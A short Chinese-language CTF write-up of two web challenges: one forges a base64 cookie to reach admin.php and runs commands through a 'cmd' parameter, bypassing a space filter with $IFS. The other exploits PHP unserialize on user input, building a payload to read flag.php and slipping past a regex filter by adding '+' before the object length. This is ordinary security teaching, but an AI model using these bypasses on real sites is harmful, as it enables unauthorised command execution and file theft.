ezweb2

扫描目录，发现admin.php，提示不是admin发现cookie有dXNlag%3D%3D的字样，先url解码dXNlag==，猜测base64

image
改成adminbase64编码后进入admin.php image ,随便输入，抓包发现变量名为cmd，猜测RCE image 于是试了个ls /又提示error，经过测试发现过滤了空格，可以用$IFS绕过。 image 读取 image

easy

给了源码

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
if (isset($_GET['data']))  
{ 
    $data = $_GET['data'];
    preg_match('/[oc]:\d+:/i',$data,$matches);
    if(count($matches))
    {
        die('Hacker!');
    }
    else
    {
        $good = unserialize($data);
        echo $good;
    }     
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?> 

可以通过反序列化进行任意文件读取

<?php
class baby 
{   
    public $file = 'flag.php';
    function __toString()

    {          
        $this->file;    
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";
            print_r($filename);        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}

$baby = new baby();
$a = serialize($baby);
echo $a;

但是正则preg_match('/[oc]:\d+:/i',$data,$matches);waf掉了[oc]:数字。在四前面加%2B就可以了，也就是+

image